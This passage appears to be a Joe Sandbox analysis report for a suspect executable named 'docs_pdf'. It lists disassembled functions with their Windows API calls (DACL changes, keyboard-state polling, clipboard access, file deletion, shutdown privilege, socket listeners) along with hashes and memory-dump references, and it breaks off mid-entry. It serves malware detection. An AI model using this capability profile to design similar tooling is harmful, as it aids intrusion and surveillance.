                                    • Instruction Fuzzy Hash: DF312E7154021B6FDF20EFA8DC84ADE77EC9F45260F144296E9C0E3154DB39DA48CB51
                                    Function 010081F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01008766
                                      • Part of subcall function 0100874A: GetLastError.KERNEL32(?,0100822A,?,?,?), ref: 01008770
                                      • Part of subcall function 0100874A: GetProcessHeap.KERNEL32(00000008,?,?,0100822A,?,?,?), ref: 0100877F
                                      • Part of subcall function 0100874A: HeapAlloc.KERNEL32(00000000,?,0100822A,?,?,?), ref: 01008786
                                      • Part of subcall function 0100874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0100879D
                                      • Part of subcall function 010087E7: GetProcessHeap.KERNEL32(00000008,01008240,00000000,00000000,?,01008240,?), ref: 010087F3
                                      • Part of subcall function 010087E7: HeapAlloc.KERNEL32(00000000,?,01008240,?), ref: 010087FA
                                      • Part of subcall function 010087E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,01008240,?), ref: 0100880B
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0100825B
                                    • _memset.LIBCMT ref: 01008270
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0100828F
                                    • GetLengthSid.ADVAPI32(?), ref: 010082A0
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 010082DD
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 010082F9
                                    • GetLengthSid.ADVAPI32(?), ref: 01008316
                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 01008325
                                    • HeapAlloc.KERNEL32(00000000), ref: 0100832C
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0100834D
                                    • CopySid.ADVAPI32(00000000), ref: 01008354
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01008385
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 010083AB
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 010083BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                    • String ID:
                                    • API String ID: 3996160137-0
                                    • Opcode ID: 5232616e64f568886749579661617613a7fc892916b651587a9a20bf24850935
                                    • Instruction ID: 36ccd1fa333ab6bf1ac6d1c3b699eaee533e388d108b1ef7c1180350e6269fcd
                                    • Opcode Fuzzy Hash: 5232616e64f568886749579661617613a7fc892916b651587a9a20bf24850935
                                    • Instruction Fuzzy Hash: AF616C71D0020AABEF119FA8DD45AEEBBB9FF44210F04C15AF995A6290DB359A05CB60
                                    Function 00FC6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                    • API String ID: 0-4052911093
                                    • Opcode ID: a04cb39eef9cf65e8004df278203df142f799a1813bec3899cc698650906f3f9
                                    • Instruction ID: 357652cd41f4c900beef620d664f8b8f8a09198dad3079668038fc0daf46bcb4
                                    • Opcode Fuzzy Hash: a04cb39eef9cf65e8004df278203df142f799a1813bec3899cc698650906f3f9
                                    • Instruction Fuzzy Hash: 31728471E0421ADBDF25CF58C981BAEB7F5FF48310F1481AAE949EB281D7349981DB90
                                    Function 01030665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 010310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030737
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 010307D6
                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0103086E
                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01030AAD
                                    • RegCloseKey.ADVAPI32(00000000), ref: 01030ABA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                    • String ID:
                                    • API String ID: 1240663315-0
                                    • Opcode ID: 7106a940a8b065b5c10a723212675da6b943c14eab9ac5bc0fb25b007c0443d8
                                    • Instruction ID: 5ec263df7b6988a040afc678b6eedd66bc3e8785823238d058bb5b15084d9fdf
                                    • Opcode Fuzzy Hash: 7106a940a8b065b5c10a723212675da6b943c14eab9ac5bc0fb25b007c0443d8
                                    • Instruction Fuzzy Hash: B2E18F31604201AFCB14DF29C884E6ABBE9FF89714F04896DF58ADB265DB35E901CF52
                                    Function 01010219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 01010241
                                    • GetAsyncKeyState.USER32(000000A0), ref: 010102C2
                                    • GetKeyState.USER32(000000A0), ref: 010102DD
                                    • GetAsyncKeyState.USER32(000000A1), ref: 010102F7
                                    • GetKeyState.USER32(000000A1), ref: 0101030C
                                    • GetAsyncKeyState.USER32(00000011), ref: 01010324
                                    • GetKeyState.USER32(00000011), ref: 01010336
                                    • GetAsyncKeyState.USER32(00000012), ref: 0101034E
                                    • GetKeyState.USER32(00000012), ref: 01010360
                                    • GetAsyncKeyState.USER32(0000005B), ref: 01010378
                                    • GetKeyState.USER32(0000005B), ref: 0101038A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: a8d470fe0847489f61052fee5f59230b6e2ed9bcc20545e0208ae72d0f025afa
                                    • Instruction ID: f2314954d64438219efbb79d60e10473db2f90c89c5b2bb429e172eccc860195
                                    • Opcode Fuzzy Hash: a8d470fe0847489f61052fee5f59230b6e2ed9bcc20545e0208ae72d0f025afa
                                    • Instruction Fuzzy Hash: CF418A34A047CAAEFFB25A6884043E6BEE46B06344F0880DDE6C5471CFD79D55C48792
                                    Function 01024458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: c35b86915ca1edc4748ea85e5a3639c5e0345812e6db2791ad1059e672855535
                                    • Instruction ID: 37ee5fe75743286776fe59e9ae06050a14186843eca129fe8cfce3393b053d93
                                    • Opcode Fuzzy Hash: c35b86915ca1edc4748ea85e5a3639c5e0345812e6db2791ad1059e672855535
                                    • Instruction Fuzzy Hash: BC2191357006219FDB21AF65EC09B6D7BACEF08710F008056F9C6DB2A1CB7AA901DF55
                                    Function 01013A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB48A1,?,?,00FB37C0,?), ref: 00FB48CE
                                      • Part of subcall function 01014CD3: GetFileAttributesW.KERNEL32(?,01013947), ref: 01014CD4
                                    • FindFirstFileW.KERNEL32(?,?), ref: 01013ADF
                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 01013B87
                                    • MoveFileW.KERNEL32(?,?), ref: 01013B9A
                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01013BB7
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 01013BD9
                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 01013BF5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 4002782344-1173974218
                                    • Opcode ID: 6af39e94956afca0e7e40a67339f8e31c57a6a3c08dee6cab3f35969ed87ae01
                                    • Instruction ID: 3ab96c4ebc9d933614b1d2cac8a94565ed01b12ae2d23af951b0c2dd4f0c5bd4
                                    • Opcode Fuzzy Hash: 6af39e94956afca0e7e40a67339f8e31c57a6a3c08dee6cab3f35969ed87ae01
                                    • Instruction Fuzzy Hash: 20518E3180020D9ACB15FBA1CE929EDB7B8BF14310F6441A9E4817B095EF296F09DBA0
                                    Function 0101F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0101F6AB
                                    • Sleep.KERNEL32(0000000A), ref: 0101F6DB
                                    • _wcscmp.LIBCMT ref: 0101F6EF
                                    • _wcscmp.LIBCMT ref: 0101F70A
                                    • FindNextFileW.KERNEL32(?,?), ref: 0101F7A8
                                    • FindClose.KERNEL32(00000000), ref: 0101F7BE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                    • String ID: *.*
                                    • API String ID: 713712311-438819550
                                    • Opcode ID: 8f4a2e5c611949a9265415d88ab97234bc3a59735054e925021b15c9726f189d
                                    • Instruction ID: 7b9e970bcf42bb98b995a1a14822262e0c44aaeb02bb357ab92f1a3bd6345398
                                    • Opcode Fuzzy Hash: 8f4a2e5c611949a9265415d88ab97234bc3a59735054e925021b15c9726f189d
                                    • Instruction Fuzzy Hash: CC41807190020B9FDF51EF64CC85AEEBBB8FF05310F14459AE995A7190DB399A48CF90
                                    Function 00FC4140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: e30c523ab10e17724735edb711a19f8bd03129771462263e1c55336af933ae66
                                    • Instruction ID: 84ef4b6842ebcbfb5d0becbf1574f85e11213117f02bb8d7d3d013e020b72123
                                    • Opcode Fuzzy Hash: e30c523ab10e17724735edb711a19f8bd03129771462263e1c55336af933ae66
                                    • Instruction Fuzzy Hash: 65A2B171E0421ACBDF24DF58CAA1BBDB7B1BF50324F1481AAD955A7294D730AE81EF40
                                    Function 00FC58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 5c5ac30adcb5c21d6e94648a16bc5b9a7dbdf8bb10d199e8523dd2a659c48eef
                                    • Instruction ID: 56ad78147bce254785f3999ffcfbe6795bcf8bca0e98628849d5696dd06ca5d4
                                    • Opcode Fuzzy Hash: 5c5ac30adcb5c21d6e94648a16bc5b9a7dbdf8bb10d199e8523dd2a659c48eef
                                    • Instruction Fuzzy Hash: 0312BA70A0060ADFDF14DFA5CA82BEEB7B5FF48300F104169E446A7295EB3AAD51DB50
                                    Function 0101545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 01008CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01008D0D
                                      • Part of subcall function 01008CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01008D3A
                                      • Part of subcall function 01008CC3: GetLastError.KERNEL32 ref: 01008D47
                                    • ExitWindowsEx.USER32(?,00000000), ref: 0101549B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: a04282702a0356fcd1c13e6d1911ee49cbadd81a3f00d6d9cc298655a38d798c
                                    • Instruction ID: fa44a47d110a1220e780014466e951bd09db2cc95f9164b088d1557d9d153bd4
                                    • Opcode Fuzzy Hash: a04282702a0356fcd1c13e6d1911ee49cbadd81a3f00d6d9cc298655a38d798c
                                    • Instruction Fuzzy Hash: 3F012831BD52126BF778527C9C4ABBA72A8AB82256F100461FDC7DA0CADEBD58004290
                                    Function 01026596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010265EF
                                    • WSAGetLastError.WSOCK32(00000000), ref: 010265FE
                                    • bind.WSOCK32(00000000,?,00000010), ref: 0102661A
                                    • listen.WSOCK32(00000000,00000005), ref: 01026629
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026643
                                    • closesocket.WSOCK32(00000000,00000000), ref: 01026657
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: e4ab97e5d0a81549111f0960b4ea08a9c24e6b05442b03ee26e72c34797cf7ba
                                    • Instruction ID: 5ab0ccf03c9313dc42cb1375d5bd69d5b8ebe2fd05231646126696094f635fd2
                                    • Opcode Fuzzy Hash: e4ab97e5d0a81549111f0960b4ea08a9c24e6b05442b03ee26e72c34797cf7ba
                                    • Instruction Fuzzy Hash: 6921D230600221AFDB20EF68C849F6EB7E9EF49320F148159E996E73D1CB75AD00DB51
                                    Function 00FC5680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                    • _memmove.LIBCMT ref: 0100062F
                                    • _memmove.LIBCMT ref: 01000744
                                    • _memmove.LIBCMT ref: 010007EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                    • String ID:
                                    • API String ID: 1300846289-0
                                    • Opcode ID: 04bbf0c926fddecd9c9ea41050c51dda505f57a93ae69978c27f4c833dcf8086
                                    • Instruction ID: 23c41f24c6431f2a074a1d678a98b8009761bde616d8911105d7b51ef81cf1f1
                                    • Opcode Fuzzy Hash: 04bbf0c926fddecd9c9ea41050c51dda505f57a93ae69978c27f4c833dcf8086
                                    • Instruction Fuzzy Hash: 9D02B1B0E00209DBDF05DF64D982BAE7BB5FF84340F148069E846DB295EB35DA50DB91
                                    Function 00FB1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FB19FA
                                    • GetSysColor.USER32(0000000F), ref: 00FB1A4E
                                    • SetBkColor.GDI32(?,00000000), ref: 00FB1A61
                                      • Part of subcall function 00FB1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FB12D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ColorProc$LongWindow
                                    • String ID:
                                    • API String ID: 3744519093-0
                                    • Opcode ID: fe9e6d0e8edf1fa33dc295d88529eb48fc71d30ae01a2ee86f389f1ef3df4c9f
                                    • Instruction ID: 5f88b6cc194039b60144fe28f24582b23413f1d1fbe6aec915398c2582e9a5c6
                                    • Opcode Fuzzy Hash: fe9e6d0e8edf1fa33dc295d88529eb48fc71d30ae01a2ee86f389f1ef3df4c9f
                                    • Instruction Fuzzy Hash: 61A180729054C6BAE6386A2B4C78EFF365DFB81361FA4011AF442E6185CE1DAD01FB71
                                    Function 01026A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 010280A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010280CB
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 01026AB1
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026ADA
                                    • bind.WSOCK32(00000000,?,00000010), ref: 01026B13
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026B20
                                    • closesocket.WSOCK32(00000000,00000000), ref: 01026B34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 99427753-0
                                    • Opcode ID: e2d3fac8244ca81789114eed0518417687388d0198e42a5dc49b10036e89ff11
                                    • Instruction ID: 685cceb06fe425898ce672de757097719ebd768a818b2dfe4d359aef3c00e186
                                    • Opcode Fuzzy Hash: e2d3fac8244ca81789114eed0518417687388d0198e42a5dc49b10036e89ff11
                                    • Instruction Fuzzy Hash: DC41E675B00210AFEB10BF65DC86FAE77E9DB44710F008058FA4AAB3C2CA799D019B91
                                    Function 010355FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: dc8ae5f8b8709b277860ad7501d5df94393b5b153ef5c1dd45cd6d9895834b97
                                    • Instruction ID: a3563f135c1b5b4c691bcb64efa4f74c2f2853dfedd41a480a1a67b058776623
